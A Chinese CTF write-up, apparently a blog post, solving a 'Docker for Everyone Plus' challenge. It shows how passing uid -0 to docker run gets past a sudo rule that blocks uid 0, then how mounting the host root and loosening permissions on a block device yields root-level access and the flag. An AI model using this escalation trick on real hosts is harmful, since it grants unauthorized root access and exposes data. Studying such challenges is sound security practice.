Docker for Everyone Plus——Unbreakable!

修改一下telnet的端口配置,访问第二小问,sudo -l命令允许提权执行的命令:

发现多了这两个限制--security-opt=no-new-privileges,表明docker run命令必须带上--security-opt=no-new-privileges参数,这可以防止通过suid机制获取root权限,同时禁止了--device参数,无法从容器内读取flag


老样子,rz传输tar.gz文件并解压载入tar镜像:

rz

gunzip dockerfile.tar.gz

sudo docker image load < dockerfile.tar


了解到一个方法:

uid是整数型,整数的+0和-0就是一个东西,不让指定uid为0,那就指定为-0来绕过

sudo docker run --rm --security-opt=no-new-privileges -u 1000:1000 --user -0:0 -v /:/host -it dockerfile

cat /host/dev/vdb

成功获取到root shell,但在容器内,依旧不能读设备块


修改一下文件权限即可,再exit退出容器,cat /dev/vdb就可以成功获取flag了:

chmod 777 /host/dev/vdb

cat /dev/vdb

flag{contA1N3R_R0ot_i5_4cCESsIb1e_c692a7d2c6}

相关推荐
云的牧人7 分钟前
Ubuntu 22 redis集群搭建
linux·运维·ubuntu
siriuuus16 分钟前
Linux 磁盘扩容及分区相关操作实践
linux·运维·服务器
衍余未了18 分钟前
k8s除了主server服务器可正常使用kubectl命令,其他节点不能使用原因,以及如何在其他k8s节点正常使用kubectl命令??
云原生·容器·kubernetes
Clownseven28 分钟前
Mattermost教程:用Docker搭建自己的开源Slack替代品 (团队聊天)
docker·容器·开源
❀͜͡傀儡师33 分钟前
Docker部署Drawnix开源白板工具
docker·容器·开源·drawnix
❀͜͡傀儡师34 分钟前
Docker部署Lunalytics开源监控工具
docker·容器·开源·lunalytics
To_再飞行35 分钟前
K8s 存储配置资源
linux·云原生·容器·kubernetes
小猪写代码1 小时前
Ubuntu 文件权限管理
linux·ubuntu
jz_ddk1 小时前
[Linux] Linux标准块设备驱动详解:从原理到实现
linux·运维·服务器·驱动开发
Gss7771 小时前
ansible变量+管理机密
linux·运维·ansible